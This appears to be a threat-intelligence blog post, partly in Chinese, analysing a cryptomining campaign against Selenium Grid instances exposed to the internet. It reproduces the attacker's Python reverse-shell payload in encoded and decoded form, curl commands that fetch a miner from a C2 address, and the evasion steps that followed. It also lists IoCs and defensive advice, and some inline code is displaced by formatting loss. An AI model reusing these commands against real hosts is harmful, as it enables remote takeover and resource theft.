TL;博士
Wiz Research 检测到一个正在进行的威胁活动,该活动利用暴露的 Selenium Grid 服务进行加密挖掘,称为“SeleniumGreed”。
Selenium 是最常用的测试框架之一。我们的数据显示,该技术可以在 30% 的云环境中找到,官方的 selenium/hub docker 镜像在 Docker Hub 中有超过 1 亿次拉取。
大多数用户不知道,Selenium WebDriver API可以与机器本身进行完全交互,包括读取和下载文件,以及运行远程命令。
默认情况下,此服务未启用身份验证。这意味着许多可公开访问的实例配置错误,任何人都可以访问并滥用于恶意目的。
我们已经发现了一个威胁行为者,该行为者针对公开暴露的 Selenium Grid 实例,并利用 Selenium WebDriver API 的功能通过反向 shell 运行 Python,以部署下载 XMRig 矿工的脚本。
截至本博客文章发布之日,威胁行为者仍处于活动状态。
我们认为这是第一个关于这种错误配置在野外被利用的文档。
介绍
Wiz Research 检测到一个名为“SeleniumGreed”的持续威胁活动,该活动利用暴露的 Selenium Grid 服务来部署加密矿工。Selenium 是一个流行的开源套件,用于测试 Web 应用程序,允许用户编写模拟不同浏览器和环境的用户交互的测试。
Selenium Grid 是 Selenium 套件中的一个组件。它提供了一个强大的 API,允许用户在链接到它的机器上启动 Web 浏览器并与之交互。大多数用户不知道的是,此 API 支持与机器本身的完全交互,包括读取和下载文件以及运行远程命令。Selenium Grid 专为在内部网络中使用而设计,默认情况下缺乏安全控制。理想情况下,此类服务绝不应暴露在互联网上。
由于此服务上缺少默认的身份验证机制,因此许多暴露的实例配置错误,可能会被恶意行为者访问和利用。这一点尤其令人担忧,因为如果服务部署在没有严格网络安全策略的可公开访问的节点上,则很容易导致严重的安全风险。令人惊讶的是,据我们所知,这是第一份关于这种错误配置在野外被利用的报告。
威胁参与者利用 Selenium WebDriver API 的功能运行带有反向 shell 的 Python,以部署下载矿工的脚本。该矿机是一个经过修改的 XMRig 矿机,装有定制的 UPX 头。威胁行为者采用了各种方法来保持无法追踪,包括使用其他受感染的 Selenium 节点的工作负载作为托管有效载荷的 C2 和矿池代理。
在这篇博客中,我们将解释威胁行为者如何利用暴露的 Selenium Grid 服务,详细说明攻击者使用的利用后有效载荷,并提供使用 Selenium 的最佳实践。
要了解有关此类云威胁的更多信息,请查看 wiz 云威胁态势。
What is Selenium Grid?
Selenium Grid enables parallel execution of tests across multiple workloads, different browsers, and various browser versions. It is designed to distribute test execution load across multiple environments, which helps reduce the time required to run a large suite of tests and ensures that applications work consistently across different browser and OS combinations.
Selenium Grid consists of a hub and nodes. The hub manages the distribution of tests to the registered nodes, while the nodes are the machines where the tests are executed. A node can be any machine registered to the hub and capable of running a browser instance. Nodes can have different operating systems and browsers, providing flexibility and diversity in test environments.
Selenium Popularity
Selenium is highly favored among developers and testers, widely used across many organizations. For reference, the selenium/hub docker image has been pulled over 100 million times, with an average of more than 150,000 pulls per week.
Selenium's popularity extends to cloud environments as well. Our data shows that it is the most common testing framework, present in over 30% of cloud environments.
The risks of exposing Selenium to the internet
Selenium provides a WebDriver API that allows users to automate web browser user interaction. The API also enables different ways to interact with the underlying infrastructure of the nodes such as reading and downloading files and executing binaries of choice. Selenium Grid is not designed to be exposed to the internet and its default configuration has no authentication enabled, so any user that has network access to the hub can interact with the nodes via API. This poses a significant security risk if the service is deployed on a machine with a public IP that has inadequate firewall policy.
Although the Selenium website includes this warning about exposing Selenium Grid to the internet, it is evident that users often overlook this warning and deploy Selenium Grid without adequate network security controls.
In the malicious activity described in this blogpost, we witnessed the threat actor utilizing older versions of Selenium (v3.141.59) to run remote commands. However, we confirmed this is also possible on the latest versions (v4 and above) of Selenium Grid.
Below are statistics from FOFA on internet exposed Selenium Grid services running the outdated version (v3.141.59 and below):
The query revealed over 15,000 unique IPs in the past year, most of them running on the default port , indicating that the container is directly exposed. 4444
A query for newer versions produced similar results, with around 15,000 instances also listening on port . This means there are more than 30,000 instances exposed to remote command execution. 4444
Executing remote commands on older versions of Selenium (before v4)
ChromeOptions is a class in Selenium WebDriver designed to manage options specific to the Chrome driver. It allows adjusting the settings and capabilities of the browser when running automated tests on Chrome.
One of the options is setting the Chrome binary path, allowing users to perform tests using different browsers versions. Threat actors can abuse this feature to set the location of Chrome binary on the machine to be the path of any other binary, such as Python. This means that instead of Chrome binary, the WebDriver will execute a Python interpreter process. Another method that can be leveraged for exploitation is add_argument. This method is designed to add Chrome arguments as part of the binary execution (there are over a thousand arguments). Threat actors with access to a Selenium Grid instance can combine these methods to execute dynamic Python script code. Below is an example of a full exploit script:
Sending a Chrome WebDriver request will also generate default chrome flags. When running Python with the flag, any option after will simply be ignored (from python's help print: -c-c-c cmd : program passed in as string (terminates option list))
It is important to note that although the capability to set the Chrome binary location path was deprecated in later versions, we confirmed that the latest version of Selenium Grid is also vulnerable to remote command execution if exposed to the internet. At this time we will refrain from publicly sharing more information about this issue.
Attack flow
In the activity we observed, the threat actor sends a request to the vulnerable Selenium Grid hub, with Chrome binary path configured to and set to pass Python program as a script. The script contains a base64 decoded payload. The payload creates a reverse shell [T1059.004], sets the environment variable to to disable command logging for interactive shell sessions [T1562.003], and defines a new environment variable, , set to : /usr/bin/python3add argument HISTFILE/dev/nullTTT192[.]241.144.69:4447
/usr/bin/python3 -cb=b'aW1wb3J0IG9zLHB0eSxzb2NrZXQ7cz1zb2NrZXQuc29ja2V0KCk7cy5jb25uZWN0KCgnMTY0LjkwLjE0OS4xMDQnLDkwMjEpKTtbb3MuZHVwMihzLmZpbGVubygpLGYpZm9yIGYgaW4oMCwxLDIpXTtvcy5wdXRlbnYoJ0hJU1RGSUxFJywnL2Rldi9udWxsJyk7b3MucHV0ZW52KCdUVFQnLCcxOTIuMjQxLjE0NC42OTo0NDQ3Jyk7cHR5LnNwYXduKCcvYmluL2Jhc2gnKTtzLmNsb3NlKCk=';import base64;exec(base64.b64decode(b).decode()) --allow-pre-commit-input --disable-background-networking --disable-client-side-phishing-detection --disable-default-apps --disable-hang-monitor --disable-popup-blocking --disable-prompt-on-repost --disable-sync --enable-automation --enable-blink-features=ShadowDOMV0 --enable-logging --log-level=0 --no-first-run --no-service-autorun --password-store=basic --remote-debugging-port=0 --test-type=webdriver --use-mock-keychain --user-data-dir=/tmp/.com.google.Chrome.ry2G5o data:,
Decoded base64 payload:
import os,pty,socket;s=socket.socket();s.connect(('164.90.149.104',9021));[os.dup2(s.fileno(),f)for f in(0,1,2)];os.putenv('HISTFILE','/dev/null');os.putenv('TTT','192.241.144.69:4447');pty.spawn('/bin/bash');s.close().
Below is the exploit process tree:
Next, the attacker creates a hidden script [T1564.001] with a random name composed of 8 characters under or (e.g., ). The attacker then executes the script with to gain the ability to run any command on the machine. By default, the , which is the Selenium process user, can run commands without requiring a password. /tmp/dev/shm/dev/shm/.18a91ec2sudoselusersudo
The following are some key actions performed by the script:
Downloads and executes the miner: It downloads the miner [T1105] () and the script responsible for running the miner () to the directory. It ensures that only users with sudo privileges can read, write, and execute these files [T1222.002] ().
curl -s http://164[.]90.149.104:9022/xm2 -o /bin/xmcurl -s http://164[.]90.149.104:9022/wxm -o /bin/wxm/binchmod 700 /bin/xm /bin/wxmTimestomping: The script changes the creation date of the downloaded files with the command . Timestomping [T1070.006] is a technique used by threat actors to alter the timestamps of files they create, making them less noticeable to forensic investigators or file analysis tools.
touch -d Fri, 12 Jul 2019 15:26:41 -0400 /bin/xm /bin/wxmModify sudoers file to enforce a password for seluser: By default, (the default Selenium user) can run sudo without the need of a password. The script checks if already has a password enforced for sudo capabilities by running on . If it does not, the script will add a password to and modify to enforce a password. We assess that the threat actor’s intention is to limit other attackers targeting the instance with the same method to maximize CPU availability for cryptomining. This is a common tactic used by cryptomining threats.
seluserselusergrep seluser ALL=(ALL) PASSWD: ALL/etc/sudoersseluser/etc/sudoers
The scripts and miner binary are all executed using [T1564.011] to ensure they continue running even after the interactive session of the reverse shell ends. nohup
After investigating the IP , we believe this IP belongs to a legitimate service that has been compromised by the threat actor [T1584.004], as it also hosts a publicly exposed Selenium Grid instance. 164[.]90.149.104
The miner binary
The miner is a XMRig miner [T1496] packed with UPX [T1027.002] (). The attacker used the custom UPX header, , probably to avoid static detection engines that rely on the signature of the vanilla headers. 861f7deb8926bb0c6d11f8e81d27b406CATSUPX!
Interestingly, the threat actor modified the open-source XMRig miner code. Instead of hardcoding the pool IP in the miner configuration, they dynamically generate it at runtime . They also set XMRig's tls-fingerprint feature within the added code (and within the configuration), ensuring the miner will only communicate with servers controlled by the threat actor. The binary does not transmit the wallet to the pool. We suspect the pool address is a legitimate IP that has been compromised and is being used as a mining pool proxy service since this IP also hosts Selenium Grid. 165[.]227.63.241:443
Threat timeline
We assess that this attacker has been active for over a year, as we came across a reddit post describing what seems to be the same campaign. Based on our data, the campaign is still active.
Who is vulnerable?
Any version of the Selenium Grid service that lacks proper authentication and network security policies is vulnerable to remote command execution. Based on our data, the threat described in this blog is targeting Selenium v3.141.59, but it may evolve to exploit later versions as well, and other threat actors may already be doing so.
Introducing the Cloud Threat Landscape, a new TI resource for cloud defenders
The Cloud Threat Landscape is a threat intelligence database that summarizes cloud incidents and offers insights into targeting patterns and initial access methods.
Read more
How can organizations defend themselves?
To protect your organization from this type of attack, consider taking the following steps:
Implement both an external network scanner and a vulnerability scanner to map exposure within your cloud environment.
Use runtime detection to address threats in real-time.
Apply network security controls, such as a firewall, to restrict network access:
Inbound: Allow only trusted IP ranges to access the service.
Outbound: Alllow outgoing traffic only to required endpoints.
Enable basic authentication to Selenium Grid instances. You can configure it by following this guide.
How can Wiz help?
Prevention
The Wiz Dynamic Scanner detects publicly exposed Selenium services within customers' cloud environments. The Wiz agentless workload scanner detects containers and VMs hosting Selenium server.
Detection
The Wiz Runtime Sensor detects events and behaviors associated with this threat and similar ones, alerting you as the adversary progresses through the attack kill chain: from the exploit and reverse shell to the initial payload delivery and ultimately to the final cryptomining activity.
Here is an example of the Wiz Runtime Sensor detecting a reverse shell used in a Selenium Grid exploit:
Wiz customers can use the pre-built queries and advisory in the Wiz Threat Center to search for vulnerable instances in their environment and detect if their environment was impacted by this threat.
Summary
We identified an active cryptomining campaign targeting older versions of Selenium Grid services that are exposed to the internet. The attacker employed various tactics to avoid detection and tracing, such as ensuring interactive shell history is not logged, timestomping, using custom UPX headers for packing the miner, avoiding hardcoding the pool proxy IP, and utilizing other compromised Selenium services as C2 server to host payloads and a mining pool proxy. While we have no evidence that recent versions of Selenium are being actively exploited by threat actors to execute remote commands, we have confirmed that it is possible.
Selenium is widely used by developers, and it is relatively easy to inadvertently expose it to the internet. Surprisingly, this is the first blog to detail such an attack. We have shared our findings with GreyNoise, and their data indicates other mining campaigns are also exploiting exposed Selenium Grid services.
These attacks underscore the necessity of having a robust security posture solution in place to assist security teams eliminate toxic risk combinations, along with a runtime protection solution that detects and responds to breaches in real-time.
Feel free to reach out to [email protected] if you’ve been impacted by this activity or wish to exchange further information and IoCs that might assist in ongoing analysis.
IoC
Miner file hashes:
| sha256 | sha1 | md5 |
|---|---|---|
| 6852b1102b0efc7ceb47520080fca57eb1a647c4e1c7ff3a40da9757c92ebaab | b64cb7dbf62eb8b9539cc1d7901a487a3fd7de9b | 861f7deb8926bb0c6d11f8e81d27b406 |
| fd5f076e99fd2ccb5f8aef5b4f69a8c2bf231808b2480f9d31955154a1509552 | 47560b0a57913d01614256e9150b6e6f5e758250 | 585fd7777074089aaa3c615169c18170 |
Binary path: /bin/xm
Script path: /bin/wxm
Network IoC:
Mining pool proxy:
165.22.195.35:443
165.227.63.241:443
C2 hosting payload:
164.90.149.104:9022
164.90.149.104:9021
192.241.144.69:4447
Mining pool TLS fingerprints:
sha1: 249d0f41d58fe90cf17bedc8d0c39c6c88e33251
sha256: d5aaa3b923dd8ede43e4cd9eea642d24f3d9be03273d5f97902bc615849af208
MITRE ATT&CK® Techniques
Command and Control - Ingress Tool Transfer (T1105)
Defense Evasion - File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification (T1222.002)
Defense Evasion - Hide Artifacts: Hidden Files and Directories (T1564.001)
Defense Evasion - Hide Artifacts: Ignore Process Interrupts (T1564.011)
Defense Evasion - Impair Defenses: Impair Command History Logging (T1562.003)
Defense Evasion - Indicator Removal: Timestomp (T1070.006)
Defense Evasion - Obfuscated Files or Information: Software Packing (T1027.002)
Execution - Command and Scripting Interpreter: Unix Shell (T1059.004)
Impact - Resource Hijacking (T1496)
Resource Development - Compromise Infrastructure: Server (T1584.004)
